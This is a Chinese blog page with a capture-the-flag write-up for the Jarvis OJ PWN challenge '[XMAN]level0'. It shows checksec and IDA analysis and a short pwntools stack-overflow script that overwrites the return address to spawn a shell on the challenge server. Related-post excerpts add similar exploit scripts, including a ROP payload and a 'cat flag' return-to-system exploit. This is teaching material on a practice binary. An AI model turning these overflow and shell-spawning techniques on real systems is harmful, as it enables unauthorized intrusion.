[Jarvis OJ - PWN]——[XMAN]level0

最新推荐文章于 2022-05-14 15:14:41 发布
原创 最新推荐文章于 2022-05-14 15:14:41 发布 · 289 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文详细介绍了JarvisOJ PWN挑战level0的解题过程,包括利用checksec检查二进制文件的安全特性,使用IDA定位system函数及返回地址,并构造payload实现远程控制。

[Jarvis OJ - PWN]——[XMAN]level0

  • 题目地址:https://www.jarvisoj.com/challenges
  • 题目:
    在这里插入图片描述
    checksec看看,64位,开启了NX保护
    在这里插入图片描述
    IDA,发现了我们的system函数,里面的参数也是我们想要的
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    找到callsystem函数的地址 0x400596 ,或者 system函数开始压参的地址0x40059A都可以作为返回地址。
    在这里插入图片描述
    exploit:
from pwn import *
p = remote("pwn2.jarvisoj.com",9881)
ret = 0x040059A # ret= 0x0400596
payload = 'a'* (0x80 + 0x8) + p64(ret)
p.sendline(payload)
p.interactive()

在这里插入图片描述

[buuctf]jarvisoj_level0
逆向萌新的博客
05-30 659
[buuctf]jarvisoj_level0
jarvisoj——[XMAN]level0
王嘟嘟的博客
07-14 557
题目 Wp 拿下来之后发现是一个64位的,直接开ida main函数,现在对main函数已经很熟悉了 这里看到一个方法 这里按照规则覆盖即可。 脚本 from pwn import * sh=remote("pwn2.jarvisoj.com","9881") data="A"*136+p64(0x400596) sh.sendline(data) sh.interactive() sh.close() ...
Jarvis OJ-PWN-[XMAN]level0 wp
分不清东西南北的Laffey
09-22 1079
地址:nc pwn2.jarvisoj.com 9881 第一次做pwn的题目 先准备一下环境 1.pwntools sudo pip install pwntools 2.python sudo apt install python-pip 先打开虚拟机 把文件放进去用checksec看一下 发现是64位的 程序编译时关了栈不可执行保护 这说明我们可以在buf里面输入shellcode和填...
linux 内存越界判断_Linux内存越界检测方法——valgrind
weixin_39670849的博客
12-20 1084
Linux内存越界检测方法——valgrind一.Valgrind1.下载安装#configure#make#makeinstall2.使用2.1内在越界写一段有内存访问越界的代码,如下:#include#include#includeintmain(){char*p=NULL;char*temp=NULL;p=(char*)malloc(sizeof(char));...
Jarvis OJ - [XMAN]level0 - Writeup
baikeng3674的博客
09-25 231
Jarvis OJ - [XMAN]level0 - Writeup M4x原创,转载请标明出处http://www.cnblogs.com/WangAoBo/p/7591552.html 来补jarvis pwn的分析了,之后几天会全都补回来 tell me something与level0类似,不再写详细Writeup 题目: 分析: ...
jarvis oj pwn
qq_44813849的博客
07-24 309
先附上一段大佬的总结,接着再说题。 栈溢出的基本套路: 找到栈溢出地址(就是搞事情的地址),基本上都是buf的地址,这个地址需要用pwntools中的p32或p64进行转换,(若程序是32位的就用p32)才能用pwntools中的sendline发送到远程连接 构建shellcode,用一句话就行shellcode = asm(shellcraft.sh()) 构建payload,payload...
18.9.18 Jarvis OJ PWN----[XMAN]level0
qq_42192672的博客
09-18 261
拖进IDA 看到有函数callsystem,那就直接把主函数往它身上引 在vulnerable里有缓冲区,试着溢出 ebp偏移量0x80个字节,覆盖后再用8个字节覆盖保存的ebp,然后将返回地址设为callsystem函数的地址 脚本 #coding=utf-8 from pwn import * #conn=process('./[XMAN]level0') conn=remot...
[Jarvis OJ - PWN]——[XMAN]level2(x64)
Y_peak的博客
02-03 881
[Jarvis OJ - PWN]——[XMAN]level2(x64) 题目地址:https://www.jarvisoj.com/challenges 题目: checksec一下,是64位程序。开启了NX保护 在IDA看一下,main函数中有我们要的system函数, vulnerable_function函数中也有。不过可惜参数都不对,任取一个system地址就好就好。但是我们找到了栈溢出的利用函数read。buf距离rbp的距离为0x80 查找一下看看有没有**"/bin/sh"字符串
Jarvis OJ [XMAN]level0
九层台
07-07 543
查保护和运行操作系统 liu@liu-F117-F:~/桌面/oj/level0$ checksec level0 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level0/level0' Arch: amd64-64-little RELRO: No RELRO Stack: No canary foun...
jarvisoj——[XMAN]]level2(x64)
王嘟嘟的博客
07-19 602
题目 Wp 这里检查一下基础项 这里看了一下,发现还是read这里出现了问题,需要进行覆盖 构造一下payload from pwn import * r=process("./level2_x64") #r=remote('pwn2.jarvisoj.com',9882) e=ELF('./level2_x64') sys_addr=e.symbols['system'] bin_addr=e.search("/bin/sh").next() pop_rdi=0x4006b3 payload='
pwn——ciscn_2019_n_1#pwn1_sctf_2016#jarvisoj_level0
LSYZWF的博客
10-26 812
文章目录ciscn_2019_n_1题目解答 ciscn_2019_n_1 题目 题目链接:https://buuoj.cn/challenges#ciscn_2019_n_1 解答 1、打开IDA进行分析 发现函数gets和系统命令cat 此函数的大致意思是输入v1的值,然后判断v2,故存在栈溢出使得v2的内存中的值为11.28125 2、判断偏移地址 v2的内存地址距离v1首地址的偏移量是30h-04h=2ch 3、gdb调试一波 没有堆栈溢出保护 4、编写脚本 11.28125的十六进制可以在I
Jarvis OJ-PWN
weixin_45461609的博客
08-08 359
pwnTest_Your_Memory Test_Your_Memory 题目名字和题目没啥关系,真·一点关系也没有。 提供了system()函数 并且在mem_test函数中的输出hint的地址,hint地址内容为cat flag。 所以只需要将返回地址改成system()所在的地址,并将hint的地址传给system就能执行cat flag命令。 from pwn import * r=remote('pwn2.jarvisoj.com',9876) e=ELF('./memory') sys_a
JarvisOJ-PWN-Level0
杀生丸?不,其实我要的是桔梗
03-15 877
JarvisOJ-PWN-Level0 IDA打开分析。 在Export找到这两个关键函数。 先双击进入main 关键函数在vulnerable_function(),继续跟进。 可以看出read函数是把标准输入的200位的写入buf中。 再看buf: 低位: 高位: 所以buf的首地址到返回地址共=(+0x0000000000000008) - (-0x00...
[JarvisOJ][pwn]HTTP
九层台
07-05 1075
用ida打开之后可以看到这是一个http服务用fork创建了新的进程来处理连接。 void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { __int16 s; // [rsp+0h] [rbp-20h] uint16_t v4; // [rsp+2h] [rbp-1Eh] uint32_t v5; /...
日行一PWN jarvisoj_level0
m0_57221101的博客
05-14 311
还是来自于BUUCTF的机器,今天的很简单,就是单纯的考察了read函数的漏洞,以及对64位寄存器的理解 开始 首先还是经典查壳和内存保护,发现啥也没有,是很简单的机器。然后IDA反编译一下,由于是64位的软件所以需要IDA64 main函数 首先可以看到主函数中知识调用了write函数,并输出了Hello, Worldn这么几个字到终端。 之后调用了vulnerable_function函数 因为反汇编并不会给出类似于write这种函数的定义, 所以需要熟悉汇编的同学自行根据效果来
Buu CTF PWN jarvisoj_level0 WriteUp
m0sway的博客
03-02 545
Buu CTF PWNjarvisoj_level0的WriteUp
Jarvis OJ [XMAN]level3 [XMAN]level3
九层台
07-07 1549
查询保护 liu@liu-F117-F:~/桌面/oj/level3$ checksec level3 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level3/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found ...
[Jarvis OJ - PWN]——[XMAN]level1
Y_peak的博客
02-01 480
[Jarvis OJ - PWN]——[XMAN]level1 题目地址:https://www.jarvisoj.com/challenges 题目: 先checksec一下,什么保护都没有开。32位程序。 看看IDA,找到了可以利用的栈溢出的read函数. 开开心心的去找system函数.找了半天没找到,同时也没有/bin/sh字符串 并且这道题什么保护都没开,应该是ret2shellcode的pwn题.buff2的地址题目给输出了出来.所以 exp: from pwn import *
[Jarvis OJ - PWN]——Typo(内涵peak小知识)
Y_peak的博客
02-17 458
[Jarvis OJ - PWN]——Typo 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先check一下, 是arm架构。还是第一次遇到。 peak小知识 和x86架构不同, arm架构arm 下的函数调用规定, 函数的第 1 ~ 4 个参数分别保存在 r0 ~ r3 寄存器中, 剩下的参数从右向左依次入栈, 被调用者实现栈平衡,函数的返回值保存在 r0 中。除此之外,arm 的 b/bl 等指令实现跳转; pc 寄存器相当于 x86 的 ei
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值